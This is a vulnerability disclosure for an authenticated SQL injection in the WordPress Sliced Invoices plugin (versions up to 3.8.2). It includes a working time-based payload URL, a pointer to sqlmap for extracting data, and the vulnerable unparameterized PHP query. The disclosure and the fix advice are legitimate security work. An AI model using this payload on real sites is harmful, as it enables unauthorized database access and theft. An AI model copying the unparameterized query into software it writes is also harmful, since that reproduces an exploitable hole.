Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS due to the use of the same GET parameter.
Intial submission of the vulnerability
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected by an Authenticated SQL Injection vulnerability.
2. Proof of Concept:
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
Detailed analysis of the vulnerability
Under wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php
at line number 2202
we can observe the use of non parameterized queries using $wpdb->get_results()
with user-supplied data:
1
$post_meta_infos = ("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
Where the $post_id
variable is assigned on line 2154
as:
1
2
3
4
/*
* get the original post id
*/
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
This vulnerability could be easily exploited by accessing example.com/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
where example.com
is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.
How to fix
Update to the latest available version of the Sliced Invoices plugin.
Public appearances
- Exploit Database: https://www.exploit-db.com/exploits/47540
- Packet Storm: https://packetstormsecurity.com/files/154953/WordPress-Sliced-Invoices-3.8.2-SQL-Injection.html